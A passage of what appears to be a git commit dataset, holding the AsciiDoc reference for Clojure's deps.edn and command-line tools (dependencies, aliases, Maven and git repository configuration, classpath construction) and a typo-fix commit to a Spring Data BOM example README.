Compute the deps map\n** Read the deps.edn configuration file in the following locations:\n*** Install directory (unless -Srepro)\n*** Config directory (if it exists and unless -Srepro)\n*** Current directory (if it exists)\n*** -Sdeps data (if it exists)\n** Combine the deps.edn maps in that order with `merge-with merge` (except for :paths where last wins)\n* Compute the resolve-deps args\n** If `-R` specifies one or more aliases, find each alias in the deps map `:aliases`\n** `merge-with` `merge` the alias maps - the result is the resolve-args map\n* Invoke `resolve-deps` with deps map and resolve-args map\n* Compute the classpath-overrides map\n** If `-C` specifies one or more aliases, find each alias in the deps map `:aliases`\n** `merge` the classpath-override alias maps\n* Invoke `make-classpath` with the libs map returned by `resolve-deps`, the paths, and the classpath-args map\n\n=== Classpath caching\n\nClasspath files are cached in the current directory under `.cpcache\/`. File are of two forms:\n\n* `.cpcache\/<hash>.libs` - a `::lib-map` in the https:\/\/github.com\/clojure\/tools.deps.alpha\/blob\/master\/src\/main\/clojure\/clojure\/tools\/deps\/alpha\/specs.clj[specs], the output of running `resolve-deps`\n* `.cpcache\/<hash>.cp` - a classpath string, the output of `make-classpath`\n\nwhere the `<hash>` is based on the config file paths, the resolve-aliases, and the classpath aliases.\n\nThe cached classpath file is used when:\n\n* It exists\n* It is newer than all `deps.edn` files\n\n== Installers\n\nFor tools installation, see the instructions in the <<xref\/..\/..\/guides\/getting_started#,Getting Started>> guide.\n\n== Glossary\n\n**Library**\n\nAn independently-developed chunk of code residing in a directory hierarchy under a root. We will narrow to those libraries that can be globally named, e.g. `my.namespace\/my-lib`.\n\n**Artifact**\n\nA snapshot of a library, captured at a point in time, possibly subjected to some build process, labeled with a version, containing some manifest documenting its dependencies, and packaged in e.g. a jar.\n\n**Coordinate**\n\nA particular version of a library chosen for use, with information sufficient to obtain and use the library.\n\n**Dependency**\n\nAn expression, at the project\/library level, that the declaring library needs the declared library in order to provide some of its functions. Must at least specify library name, might also specify version and other attrs. Actual (functional) dependencies are more fine-grained. \n\nDependency types:\n\n* maven artifacts\n* unversioned libraries - a file location identifying a jar or directory root\n* git coordinates\n\n**Classpath (and roots\/paths)**\n\nAn ordered list of local 'places' (filesystem directories and\/or jars) that will form root paths for searches of requires\/imports at runtime, supplied as an argument to Java which controls the semantics. We discourage order-dependence in the classpath, which implies something is duplicated (and thus likely broken).\n\n**Expansion**\n\nGiven a set of root dependencies, a full walk of the transitive dependencies.\n\n**Resolution**\n\nGiven a collection of root dependencies and additional modifications, creates a fully-expanded dependency tree, then produces a mapping from each library mentioned to a single version to be used that would satisfy all dependents, as well as the local path. We will also include those dependents for each entry. Conflicts arise only if libraries depend on different major versions of a library.\n\n**Classpath creation**\n\nCreates a classpath from a resolved lib-map and optional extra local lib paths. Current plan for lib-map does not provide for control over resulting order.\n\n**Version**\n\nA human numbering system whose interpretation is determined by convention. Usually x.y.z. Must protect against 'semver' interpretation, which allows libraries to break users while keeping the name the same. Ascending by convention - higher numbers are 'later', vague compatibility with lower\/earlier.\n\n**Version difference**\n\nThis occurs when the dependency expansion contains the same library with more than one \"version\" specified but where there is a relative ordering (either by number or by SHA etc). Version differences can be resolved by choosing the \"later\" or \"newest\" version when that relationship can be established.\n\n**Version conflict**\n\nA version conflict occurs when the dependency expansion contains the same library with more than one \"version\" such that the best choice cannot be automatically chosen:\n\n* semver version breakage (major version changed)\n* github shas that do not contain any common root or ancestry (two shas on different branches or unrelated repos, for example)\n* versions that cross different repos or repo types such that no relative relationship can be established\n\n**Maven Repo**\n\nA repository of library artifacts - e.g. Maven central or Clojars\n\n**Requires and imports**\n\nMentions in source code of library (sub)components that must be in the classpath in order to succeed. namespace and package\/class names are transformed into path components.\n\n== Tools\n\nSee the project's wiki for a https:\/\/github.com\/clojure\/tools.deps.alpha\/wiki\/Tools[list of tools that use or work with tools.deps.alpha (or the clojure tools)] - tools for project creation, packaging, and much more.\n","old_contents":"Alex Miller\n2017-11-30\n:type: reference\n:toc: macro\n:icons: font\n:prevpagehref: lisps\n:prevpagetitle: Differences with Lisps\n\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\ntoc::[]\n\n== Rationale\n\nClojure \"endeavors to be a general-purpose language suitable in those areas where Java is suitable\" (from <<xref\/..\/..\/about\/rationale#,Rationale>>). To effectively target the JVM platform, Clojure needs to provide ready access to Java libraries, ideally in a way suited for dynamic development. In practice, this means meeting the JVM platform in two places:\n\n* the classpath used when invoking JVM processes (and\/or URLClassLoaders)\n* transitive dependency download and resolution from providers like Maven\n\nClojure build tools have traditionally taken the approach of wrapping the Maven ecosystem to gain access to Java libraries. However, they have also forced this approach on Clojure code as well, requiring a focus on artifacts that must be built and deployed (which Clojure does not require). This approach has created friction for Clojure developers, making it hard to e.g. work with libs not yet publishing artifacts, work on speculative changes w\/o artifacts or across multiple libs, or give control to a 3rd party to manage shared dependencies.\n\nClojure provides:\n\n* https:\/\/github.com\/clojure\/tools.deps.alpha[tools.deps.alpha] - a library providing a functional API for resolving dependency graphs and building classpaths that can utilize both Maven and other providers of code or artifacts\n* Command line tools (`clojure` and `clj`) that enable users to make use of this capability at the terminal to declare dependencies, assemble classpaths, and launch Clojure programs\n* System-specific installers for downloading the tools, improving the \"Getting Started\" experience\n\n== Building classpaths with tools.deps.alpha\n\nThe JVM classpath consists of a series of roots, either directory paths or the path to a jar file. Classes (and Clojure files) map via package or namespace to a path relative to a classpath root. For example, the `java.lang.String` class can be found at path `java\/lang\/String.class` and the `clojure.set` Clojure namespace may be found at paths `clojure\/set.class` (for AOT), `clojure\/set.clj`, or `clojure\/set.cljc`. When the JVM needs to load one of these files it searches each root for the relative path and loads it when found.\n\nWe divide the process of building a classpath into two primary operations: `resolve-deps` and `make-classpath`. Below is a high-level view of this process:\n\n\nimage::\/images\/content\/guides\/deps\/deps.png[\"Dep Tools\", link=\"\/images\/content\/guides\/deps\/deps.png\"]\n\n=== resolve-deps\n\n**`(resolve-deps deps args-map)`**\n\n`resolve-deps` takes an initial map of required dependencies and a map of args that modify the resolution process. It builds a full graph of transitive dependencies, resolves any version differences, and flattens that graph to a full list of dependencies required in the classpath.\n\nThe deps are a map of library to coordinate. The library is (in Maven terms) the groupId and artifactId, which are sufficient to locate the desired project. The coordinate is used to describe a particular version that is being requested from a particular provider (like Maven).\n\nFor example, this deps map specifies a (Maven-based) dependency:\n\n[source,clojure]\n----\n{org.clojure\/core.cache {:mvn\/version \"0.6.5\"}}\n----\n\n`resolve-deps` expands these dependencies to include all transitive dependencies, cut cycles, resolve version differences, download required artifacts from the provider, and produce a *lib map* of the flattened set of all needed dependencies and where to find their artifacts:\n\n[source,clojure]\n----\n{org.clojure\/core.cache {:mvn\/version \"0.6.5\",\n :deps\/manifest :mvn,\n :paths [\"...\/core.cache-0.6.5.jar\"]}\n org.clojure\/data.priority-map {:mvn\/version \"0.0.7\",\n :deps\/manifest :mvn,\n :dependents [org.clojure\/core.cache],\n :paths [\"...\/data.priority-map-0.0.7.jar\"]} \n ... }\n----\n\nThe lib map lists all libraries, their selected coordinates, the `:paths` on disk, and a list of dependents that caused it to be included. Here you can see that `data.priority-map` was included as a dependency of core.cache.\n\nThe second `args-map` is a map of optional modifications to the standard expansion to account for common use cases: adding extra dependencies, overriding deps, and default deps. These can be used separately or together, or not at all:\n\n[source,clojure]\n----\n{:extra-deps { ... }\n :override-deps { ... }\n :default-deps { ... }}\n----\n\n`:extra-deps` is the most common modification - it allows you to optionally add extra dependencies to the base dependency set. The value is a map of library to coordinate:\n\n[source,clojure]\n----\n{:extra-deps {criterium\/criterium {:mvn\/version \"0.4.4\"}}}\n----\n\n`:override-deps` overrides the coordinate version chosen by the version resolution to force a particular version instead. This also takes a map of library to coordinate:\n\n[source,clojure]\n----\n{:override-deps {org.clojure\/clojure {:mvn\/version \"1.9.0\"}}}\n----\n\n`:default-deps` provides a set of default coordinate versions to use if no coordinate is specified. The default deps can be used across a set of shared projects to act as a dependency management system:\n\n[source,clojure]\n----\n{:default-deps {org.clojure\/core.cache {:mvn\/version \"0.6.4\"}}}\n----\n\n=== make-classpath\n\n**`(make-classpath lib-map paths args-map)`**\n\nThe `make-classpath` step takes the lib map (the result of `resolve-deps`), the internal source paths of the project `[\"src\"]`, an args-map of optional modifications, and produces a classpath string for use in the JVM.\n\nThe args-map includes support for modifications to be applied while making the classpath: adding extra paths, and overriding the location of libraries specified in the lib map. These modifications can be used separately or together or not at all in a map like this:\n\n[source,clojure]\n----\n{:extra-paths [ ... ]\n :classpath-overrides { ... }}\n----\n\n`:extra-paths` is used to include source paths in addition to your standard source paths, for example to include directories of test source:\n\n[source,clojure]\n----\n{:extra-paths [\"test\" \"resources\"]}\n----\n\n`:classpath-overrides` specify a location to pull a dependency that overrides the path found during dependency resolution, for example to replace a dependency with a local debug version. Many of these use cases are ones where you would be tempted to prepend the classpath to \"override\" something else.\n\n[source,clojure]\n----\n{:classpath-overrides \n {org.clojure\/clojure \"\/my\/clojure\/target\"}}\n----\n\n== Command line tools\n\n=== Directories\n\nThe tools rely on several directories and optionally on several environment variables.\n\n* Installation directory\n** Created during installation\n** Contents:\n*** `bin\/clojure` - main tool\n*** `bin\/clj` - wrapper for interactive repl use (uses `rlwrap`)\n*** `deps.edn` - install level deps.edn file, with some default deps (Clojure, etc) and provider config\n*** `example-deps.edn` - commented example that gets copied to `<config_dir>\/deps.edn`\n*** `libexec\/clojure-tools-X.Y.Z.jar` - uberjar invoked by `clojure` to construct classpaths\n* Config directory\n** Holds a deps.edn file that persists across tool upgrades and affects all projects\n** Locations used in this order:\n*** If `$CLJ_CONFIG` is set, then use `$CLJ_CONFIG` (explicit override)\n*** If `$XDG_CONFIG_HOME` is set, then use `$XDG_CONFIG_HOME\/clojure` (Freedesktop conventions)\n*** Else use `$HOME\/.clojure` (most common)\n** Contents:\n*** `deps.edn` - user deps file, defines default Clojure version and provider defaults\n* Cache directory\n** Lazily created when `clojure` is invoked without a local `deps.edn` file. Locations used in this order:\n*** If `$CLJ_CACHE` is set, then use `$CLJ_CACHE` (explicit override)\n*** If `$XDG_CACHE_HOME` is set, then use `$XDG_CACHE_HOME\/clojure` (Freedesktop conventions)\n*** Else use `config_dir\/.cpcache` (most common)\n* Project directory\n** The current directory\n** Contents:\n*** `deps.edn` - optional project deps\n*** `.cpcache` - project cache directory, same as the user-level cache directory, created if there is a `deps.edn`\n\n=== deps.edn\n\nThe configuration file format (in \"deps.edn\" files) is an edn map with top-level keys for `:deps`, `:paths`, and `:aliases`, plus provider-specific keys for configuring dependency sources.\n\nAfter installation, deps.edn configuration files can be found in (up to) three locations:\n\n- installation directory - created only at install time\n- config directory (often ~\/.clojure) - modified to change cross-project (or no-project) defaults\n- the local directory - per-project settings\n\nThe `deps.edn` files in each of these locations (if they exist) are merged to form one combined dependency configuration. The merge is done in the order above install\/config\/local, last one wins. The operation is essentially `merge-with merge`, except for the `:paths` key, where only the last one found is used (they are not combined).\n\nYou can use the `-Sverbose` option to see all of the actual directory locations.\n\n=== Dependencies\n\nDependencies are declared in deps.edn with a top level key `:deps` - a map from library to coordinate. Libraries are symbols of the form <groupID>\/<artifactId> or simply <id> if the group and artifact ID are the same. To indicate a classifier, use <groupId>\/<artifactId>$<classifier>. \n\nCoordinates can take several forms depending on the coordinate type:\n\n* Maven coordinate: `{:mvn\/version \"1.2.3\"}`\n** Other optional keys: `:extension`, `:exclusions`\n** Note: `:classifier` is no longer supported - add to lib name as specified above\n* Local project coordinate: `{:local\/root \"\/path\/to\/project\"}`\n** Optional key `:deps\/manifest`\n*** Specifies the project manifest type\n*** Default is to auto-detect the project type (currently either `:deps` or `:pom`)\n* Local jar: `{:local\/root \"\/path\/to\/file.jar\"}`\n** If the jar has been packaged with a pom.xml file, the pom will be read and used to find transitive deps\n* Git coordinate: `{:git\/url \"https:\/\/github.com\/user\/project.git\", :sha \"sha\", :tag \"tag\"}`\n** Required key `:git\/url` can be one of the following:\n*** https - secure anonymous access to public repos\n*** ssh or user@host form urls (including GitHub) - ssh-based access (see Git configuration section)\n** Required key `:sha` should indicate the full commit sha\n** Optional key `:tag` is used only to indicate the semantics of the sha\n** Optional key `:deps\/root`\n*** Specifies the relative path within the root to search for the manifest file\n** Optional key `:deps\/manifest` - same as in `:local` deps\n\n[source,clojure]\n----\n{:deps\n {org.clojure\/tools.reader {:mvn\/version \"1.1.1\"}\n github-sally\/awesome {:git\/url \"https:\/\/github.com\/sally\/awesome.git\", :sha \"123abcd549214b5cba04002b6875bdf59f9d88b6\"}\n ;; ... add more here\n }}\n----\n\n=== Paths\n\nPaths are declared in a top level key `:paths` and is a vector of string paths (typically relative to the project root). These source paths will be included on the classpath.\n\nWhile dependency sets are merged across all of the configuration files, only the last paths found in one of the config files is used, prior ones are ignored.\n\n[source,clojure]\n----\n{:paths [\"src\"]}\n----\n\n=== Aliases\n\nAliases give a name to a data structure that can be used either by the Clojure tool itself or other consumers of deps.edn. They are defined in the `:aliases` section of the config file. These Clojure tool flags use the following well-known alias keys:\n\n* -R - uses these keys when expanding deps during `resolve-deps`:\n** `:extra-deps` - a deps map from lib to coordinate of deps to add to the deps\n** `:override-deps` - a deps map from lib to coordinate of override versions to use\n** `:default-deps` - a deps map from lib to coordinate of versions to use if none is found\n** If multiple alias maps with these keys are activated, all of them are merge-with merged\n* -C - uses these keys when creating the classpath during `make-classpath`:\n** `:extra-paths` - a collection of string paths to add to `:paths`\n** `:classpath-overrides` - a map of lib to string path to replace the location of the lib\n** If multiple maps with these keys are activated, `:extra-paths` concatenate and `:classpath-overrides` merge-with merge\n* -O - uses these keys when constructing the final command JVM options:\n** `:jvm-opts` - a collection of string JVM options\n** If multiple maps with these keys are activated, `:jvm-opts` concatenate\n** If -J JVM options are also specified on the command line, they are concatenated after the alias options\n* -M - uses these keys when constructing the final command clojure.main arguments:\n** `:main-opts` - a collection of clojure.main options\n** If multiple maps with these keys are activated, only the last one will be used\n** If command line clojure.main arguments are supplied on the command line, they are concatenated after the last main alias map\n* -A - activates all of the keys above, also these keys are only supported with -A:\n** `:deps` - a deps map from lib to coordinate of deps to REPLACE the project `:deps`\n** `:paths` a collection of string paths to REPLACE project `:paths`\n\nSo given a deps.edn like:\n\n[source,clojure]\n----\n{:paths [\"src\"]\n :deps {}\n :aliases\n {:1.7 {:override-deps {org.clojure\/clojure {:mvn\/version \"1.7.0\"}}}\n :bench {:extra-deps {criterium\/criterium {:mvn\/version \"0.4.4\"}}}\n :test {:extra-paths [\"test\"]}}}\n----\n\nYou can activate all three aliases to create a classpath that switches to an older Clojure version, adds the benchmarking library, and includes the test directory in the classpath to see how it changes the classpath:\n\n[source]\n----\nclj -R:1.7:bench -C:test -Spath\n----\n\nYou can use -A to include all types of aliases or define aliases that cross multiple alias types:\n\n[source]\n----\nclj -A:1.7:bench:test -Spath\n----\n\n=== Procurers\n\nCoordinates are interpreted by procurers, which know how to determine dependencies for a library and download artifacts. tools.deps.alpha is designed to support an extensible set of procurers that can expand over time. Currently the available procurers are: `mvn`, `local`, and `git`.\n\nThe procurer to use is determined by examining the attributes of the coordinate and using the first attribute qualifier that's found (ignoring the reserved qualifier \"deps\"). For example, a Maven coordinate contains a `:mvn\/version` attribute and a local coordinate contains a `:local\/root` attribute.\n\nProcurers may also have configuration attributes stored at the root of the configuration map under the same qualifier. The `mvn` procurer will look for `:mvn\/repos`. The installation deps.edn configures the default Maven repos:\n\n[source,clojure]\n----\n{:mvn\/repos\n {\"central\" {:url \"https:\/\/repo1.maven.org\/maven2\/\"}\n \"clojars\" {:url \"https:\/\/clojars.org\/repo\"}}}\n----\n\n==== Maven authenticated repos\n\nFor Maven deps in authenticated repositories, existing Maven infrastructure is used to convey credentials.\n\nIn your `~\/.m2\/settings.xml`:\n\n[source,xml]\n----\n<settings>\n ...\n <servers>\n <server>\n <id>my-auth-repo<\/id>\n <username>zango<\/username>\n <password>123<\/password>\n <\/server>\n ...\n <\/servers>\n ...\n<\/settings>\n----\n\nThen in your `deps.edn` include a repo with a name matching the server id (here `my-auth-repo`):\n\n[source,clojure]\n----\n{:deps\n {authenticated\/dep {:mvn\/version \"1.2.3\"}}\n :mvn\/repos\n {\"my-auth-repo\" {:url \"https:\/\/my.auth.com\/repo\"}}}\n----\n\nThen just refer to your dependencies as usual in the `:deps`.\n\n==== Maven S3 repos\n\nThe tools also provide support for connecting to public and private S3 Maven repositories.\n\nAdd a `:mvn\/repos` that includes the s3 repository root:\n\n[source,clojure]\n----\n{:deps\n {my.library {:mvn\/version \"0.1.2\"}}\n :mvn\/repos\n {\"my-private-repo\" {:url \"s3:\/\/my-bucket\/maven\/releases\"}}}\n----\n\nS3 buckets are specific to the AWS region they were created in. The s3 transporter will attempt to determine the bucket's location. If that doesn't work, you can specify the bucket region in the url explicitly: `\"s3:\/\/my-bucket\/maven\/releases?region-us-west-2\"`.\n\nFor authenticated repos, AWS credentials can be set in the `~\/.m2\/settings.xml` on a per-server basis or will be loaded ambiently from the AWS credential chain (env vars, etc). The repository name in `deps.edn` must match the server id in `settings.xml`:\n\n[source,xml]\n----\n<settings>\n ...\n <servers>\n <server>\n <id>my-private-repo<\/id>\n <username>AWS_ACCESS_KEY_HERE<\/username>\n <password>AWS_SECRET_ACCESS_KEY_HERE<\/password>\n <\/server>\n ...\n <\/servers>\n ...\n<\/settings>\n----\n\nAWS S3 credentials can be set in the environment using one of these mechanisms:\n\n1. Set the environment variables `AWS_ACCESS_KEY_ID` and `AWS_SECRET_ACCESS_KEY`.\n2. Create a default profile in the AWS credentials file `~\/.aws\/credentials` (older `~\/.aws\/config` also supported).\n3. Create a named profile in the AWS credentials file and set the environment variable `AWS_PROFILE` with its name.\n4. Amazon ECS container and instance profile credentials should also work, but have not been tested.\n\nFor more information, most of the advice in https:\/\/docs.aws.amazon.com\/sdk-for-java\/v1\/developer-guide\/credentials.html[this AWS document] describes how credentials are located. Note however that the Java system properties options will NOT work with the command line tools (but would work if using the tools.deps.alpha library directly).\n\n==== Maven proxies\n\nIn environments where the internet is accessed via a proxy, existing Maven configuration in `~\/.m2\/settings.xml` is used to set up the proxy connection:\n\n[source,xml]\n----\n<settings>\n ...\n <proxies>\n <proxy>\n <id>my-proxy<\/id>\n <host>proxy.my.org<\/host>\n <port>3128<\/port>\n <nonProxyHosts>localhost|*.my.org<\/nonProxyHosts>\n <\/proxy>\n <\/proxies>\n ...\n<\/settings>\n----\n\nRefer to the Maven https:\/\/maven.apache.org\/guides\/mini\/guide-proxies.html[Guide to using proxies] for further details.\n\n==== Maven HTTP headers\n\nFor adding custom headers to outgoing HTTP requests, existing Maven configuration in `~\/.m2\/settings.xml` is used.\n\n[source,xml]\n----\n<settings>\n ...\n <servers>\n <server>\n <id>my-token-repo<\/id>\n <configuration>\n <httpHeaders>\n <property>\n <name>Private-Token<\/name>\n <value>abc123<\/value>\n <\/property>\n <\/httpHeaders>\n <\/configuration>\n <\/server>\n ...\n <\/servers>\n ...\n<\/settings>\n----\n\nThe server id in `settings.xml` must match the repository name in `deps.edn`:\n\n[source,clojure]\n----\n{:mvn\/repos\n {\"my-token-repo\" {:url \"https:\/\/my.auth.com\/repo\"}}}\n----\n\nThis mechanism is used by repositories that authenticate using a token, rather than by username and password.\n\n==== Git configuration\n\nThe supported git url protocols are https and ssh. https repos will be accessed anonymously and require no additional authentication information. This approach is recommended for public repos.\n\nssh repos may be either public or private. Access to a git repo via ssh requires an ssh keypair. The private key of this keypair may or may not have a passphrase. ssh authentication works by connecting to the local ssh agent (ssh-agent on *nix or Pageant via PuTTY on Windows).\nThe ssh-agent must have a registered identity for the key being used to access the Git repository.\nTo check whether you have registered identities, use:\n\n[source,shell]\n----\n$ ssh-add -l\n2048 SHA256:S2SMY1YRTRFg3sqsMy1eTve4ag78XEzhbzzdVxZroDk \/Users\/me\/.ssh\/id_rsa (RSA)\n----\n\nwhich should return one or more registered identities, typically the one at `~\/.ssh\/id_rsa`.\n\nFor more information on creating keys and using the ssh-agent to manage your ssh identities, GitHub provides excellent info:\n\n* https:\/\/help.github.com\/articles\/generating-a-new-ssh-key-and-adding-it-to-the-ssh-agent\/\n* https:\/\/help.github.com\/articles\/working-with-ssh-key-passphrases\/\n\n_Note: user\/password authentication is not supported for any protocol._\n\n=== Usage\n\nUsage:\n\n* `clojure [dep-opt*] [init-opt*] [main-opt] [arg*]`\n* `clj [dep-opt*] [init-opt*] [main-opt] [arg*]`\n\nThe clojure tool is a runner for Clojure. clj is a wrapper for interactive repl use. These tools ultimately construct and invoke a command-line of the form:\n\n`java [java-opt*] -cp classpath clojure.main [init-opt*] [main-opt] [arg*]`\n\nThe dep-opts are used to build the java-opts and classpath:\n\n----\n-Jopt Pass opt through in java_opts, ex: -J-Xmx512m\n-Ralias... Concatenated resolve-deps aliases, ex: -R:bench:1.9\n-Calias... Concatenated make-classpath aliases, ex: -C:dev\n-Oalias... Concatenated jvm option aliases, ex: -O:mem\n-Malias... Concatenated clojure.main option aliases, ex: -M:myapp\n-Aalias... Concatenated aliases of any type\n-Sdeps DEPS Deps data to use as the final deps file\n-Spath Compute classpath and echo to stdout only\n-Scp CP Do NOT compute or cache classpath, use this one instead\n-Srepro Ignore the ~\/.clojure\/deps.edn config file\n-Sforce Force recomputation of the classpath (don't use the cache)\n-Spom Generate (or update an existing) pom.xml with deps and paths\n-Stree Print dependency tree\n-Sresolve-tags Resolve git coordinate tags to shas and update deps.edn\n-Sverbose Print important path info to console\n-Sdescribe Print environment and command parsing info as data\n----\n\ninit-opt:\n\n----\n-i, --init path Load a file or resource\n-e, --eval string Eval exprs in string; print non-nil values\n----\n\nmain-opt:\n\n----\n-m, --main ns-name Call the -main function from namespace w\/args\n-r, --repl Run a repl\npath Run a script from a file or resource\n- Run a script from standard input\n-h, -?, --help Print this help message and exit\n----\n\n=== Classpath construction\n\nThe following process is used to construct the classpath for invoking clojure.main:\n\n* Compute the deps map\n** Read the deps.edn configuration file in the following locations:\n*** Install directory (unless -Srepro)\n*** Config directory (if it exists and unless -Srepro)\n*** Current directory (if it exists)\n*** -Sdeps data (if it exists)\n** Combine the deps.edn maps in that order with `merge-with merge` (except for :paths where last wins)\n* Compute the resolve-deps args\n** If `-R` specifies one or more aliases, find each alias in the deps map `:aliases`\n** `merge-with` `merge` the alias maps - the result is the resolve-args map\n* Invoke `resolve-deps` with deps map and resolve-args map\n* Compute the classpath-overrides map\n** If `-C` specifies one or more aliases, find each alias in the deps map `:aliases`\n** `merge` the classpath-override alias maps\n* Invoke `make-classpath` with the libs map returned by `resolve-deps`, the paths, and the classpath-args map\n\n=== Classpath caching\n\nClasspath files are cached in the current directory under `.cpcache\/`. File are of two forms:\n\n* `.cpcache\/<hash>.libs` - a `::lib-map` in the https:\/\/github.com\/clojure\/tools.deps.alpha\/blob\/master\/src\/main\/clojure\/clojure\/tools\/deps\/alpha\/specs.clj[specs], the output of running `resolve-deps`\n* `.cpcache\/<hash>.cp` - a classpath string, the output of `make-classpath`\n\nwhere the `<hash>` is based on the config file paths, the resolve-aliases, and the classpath aliases.\n\nThe cached classpath file is used when:\n\n* It exists\n* It is newer than all `deps.edn` files\n\n== Installers\n\nFor tools installation, see the instructions in the <<xref\/..\/..\/guides\/getting_started#,Getting Started>> guide.\n\n== Glossary\n\n**Library**\n\nAn independently-developed chunk of code residing in a directory hierarchy under a root. We will narrow to those libraries that can be globally named, e.g. `my.namespace\/my-lib`.\n\n**Artifact**\n\nA snapshot of a library, captured at a point in time, possibly subjected to some build process, labeled with a version, containing some manifest documenting its dependencies, and packaged in e.g. a jar.\n\n**Coordinate**\n\nA particular version of a library chosen for use, with information sufficient to obtain and use the library.\n\n**Dependency**\n\nAn expression, at the project\/library level, that the declaring library needs the declared library in order to provide some of its functions. Must at least specify library name, might also specify version and other attrs. Actual (functional) dependencies are more fine-grained. \n\nDependency types:\n\n* maven artifacts\n* unversioned libraries - a file location identifying a jar or directory root\n* git coordinates\n\n**Classpath (and roots\/paths)**\n\nAn ordered list of local 'places' (filesystem directories and\/or jars) that will form root paths for searches of requires\/imports at runtime, supplied as an argument to Java which controls the semantics. We discourage order-dependence in the classpath, which implies something is duplicated (and thus likely broken).\n\n**Expansion**\n\nGiven a set of root dependencies, a full walk of the transitive dependencies.\n\n**Resolution**\n\nGiven a collection of root dependencies and additional modifications, creates a fully-expanded dependency tree, then produces a mapping from each library mentioned to a single version to be used that would satisfy all dependents, as well as the local path. We will also include those dependents for each entry. Conflicts arise only if libraries depend on different major versions of a library.\n\n**Classpath creation**\n\nCreates a classpath from a resolved lib-map and optional extra local lib paths. Current plan for lib-map does not provide for control over resulting order.\n\n**Version**\n\nA human numbering system whose interpretation is determined by convention. Usually x.y.z. Must protect against 'semver' interpretation, which allows libraries to break users while keeping the name the same. Ascending by convention - higher numbers are 'later', vague compatibility with lower\/earlier.\n\n**Version difference**\n\nThis occurs when the dependency expansion contains the same library with more than one \"version\" specified but where there is a relative ordering (either by number or by SHA etc). Version differences can be resolved by choosing the \"later\" or \"newest\" version when that relationship can be established.\n\n**Version conflict**\n\nA version conflict occurs when the dependency expansion contains the same library with more than one \"version\" such that the best choice cannot be automatically chosen:\n\n* semver version breakage (major version changed)\n* github shas that do not contain any common root or ancestry (two shas on different branches or unrelated repos, for example)\n* versions that cross different repos or repo types such that no relative relationship can be established\n\n**Maven Repo**\n\nA repository of library artifacts - e.g. Maven central or Clojars\n\n**Requires and imports**\n\nMentions in source code of library (sub)components that must be in the classpath in order to succeed. namespace and package\/class names are transformed into path components.\n\n== Tools\n\nSee the project's wiki for a https:\/\/github.com\/clojure\/tools.deps.alpha\/wiki\/Tools[list of tools that use or work with tools.deps.alpha (or the clojure tools)] - tools for project creation, packaging, and much more.\n","returncode":0,"stderr":"","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"3c7e6e11d23309619a0f2638ce5bea9445762361","subject":"Fix typos in readme.","message":"Fix typos in readme.\n\nOriginal pull request #645","repos":"spring-projects\/spring-data-examples,spring-projects\/spring-data-examples,spring-projects\/spring-data-examples","old_file":"bom\/README.adoc","new_file":"bom\/README.adoc","new_contents":"= Spring Data - Release Train BOM example\n\nThis project shows the usage of the Spring Data BOM in a non-Spring-Boot project with both Maven and Gradle.\n\n== Properties\n\nIn both Maven and Gradle a couple of properties are used to define the versions of Spring Framework and Spring Data to use. For Spring Framework a plain version is used. For Spring Data we refer to the https:\/\/spring.io\/blog\/2020\/04\/30\/updates-to-spring-versions[calver revision] of the BOM. The naming of Spring Data releases uses the following conventions:\n\n** `${calver-version}-M1` -> Milestones\n** \u2026\n** `${calver-version}-RC1` -> Release candidate\n** \u2026\n** `${calver-version}` -> GA version\n** `${calver-version}` -> Services release (bugfixes) for that release train\n\n== Maven\n\nThe `<dependencyManagement \/>` section declares dependencies to the BOMs for both Spring and Spring Data, using the `import` scope and `pom` type.\n\nThe standard `<dependencies \/>` section can now list Spring Framework and Spring Data dependencies without declaring a version and still be sure all libraries are in matching versions.\n\nNote that we do not declare a Spring Framework dependency here. The import of the Spring Framework BOM nonetheless makes sure we control the version of all transitive Spring Framework dependencies pulled in by the Spring Data modules.\n\n== Gradle\n\nGradle does not support Maven BOMs (Bill of Materials) out of the box, so the first thing to do is to import the\nhttps:\/\/github.com\/spring-gradle-plugins\/dependency-management-plugin[dependency management plugin]. This example is based on Java,\nbut if you need a different language plugin (e.g. Kotlin), you can do so.\n\nThe `dependencyManagement` section can be used to import the Spring Framework BOM and Spring Data BOM.\n\nThe standard `dependencies` section can now list Spring and Spring Data dependencies without declaring a version and still\nbe sure all libraries are align with each other.\n\nNote how you do not declare a Spring Framework dependency. Nevertheless, the dependency management plugin and the Spring Framework BOM\nensures you control the version of all transitive Spring Framework dependencies pulled in by Spring Data.\n","old_contents":"= Spring Data - Release Train BOM example\n\nThis project shows the usage of the Spring Data BOM in a non-Spring-Boot project with both Maven and Gradle.\n\n== Properties\n\nIn both Maven and Gradle a couple of properties are used to define the versions of Spring Framework and Spring Data to use. For Spring Framework a plain version is used. For Spring Data we refer to the https:\/\/spring.io\/blog\/2020\/04\/30\/updates-to-spring-versions[calver revision] of the BOM. The naming of Spring Data releases uses the following conventions:\n\n** `${calver-version}-M1` -> Milestones\n** \u2026\n** `${calver-version}-RC1` -> Release candidate\n** \u2026\n** `${calver-version}` -> GA version\n** `${calver-version}` -> Services release (bugfixes) for that release train\n\n== Maven\n\nThe `<dependencyManagement \/>` section declares dependencies to the BOMs for both Spring and Spring Data, using the `import` scope and `pom` type.\n\nThe standard `<dependencies \/>` section can now list Spring Framework and Spring Data dependencies without declaring a version and still be sure all libraries are in matching versions.\n\nNote, that we don't declare a Spring Framework dependency here. The import of the Spring Framework BOM nonetheless makes sure we control the version of all transitive Spring Framework dependencies pulled in by the Spring Data modules.\n\n== Gradle\n\nGradle does not support Maven BOMs (Bill of Materials) out of the box, so the first thing to do is important the\nhttps:\/\/github.com\/spring-gradle-plugins\/dependency-management-plugin[dependency management plugin]. This example is based on Java,\nbut if you need a different language plugin (e.g. Kotlin), you can do so.\n\nThe `dependencyManagement` section can be used to import the Spring Framework BOM and Spring Data BOM.\n\nThe standard `dependencies` section can now list Spring and Spring Data dependencies without declaring a version and still\nbe sure all libraries are align with each other.\n\nNote how you don't declare a Spring Framework dependency. Nevertheless, the dependency management plugin and the Spring Framework BOM\nensures you control the version of all transitive Spring Framework dependencies pulled in by Spring Data.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6e05975fceeae6ac0625d3248d0e1881e54a8e37","subject":"chore(Golossary): promise\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u306e\u8868\u793a\u3092\u4fee\u6b63","message":"chore(Golossary): 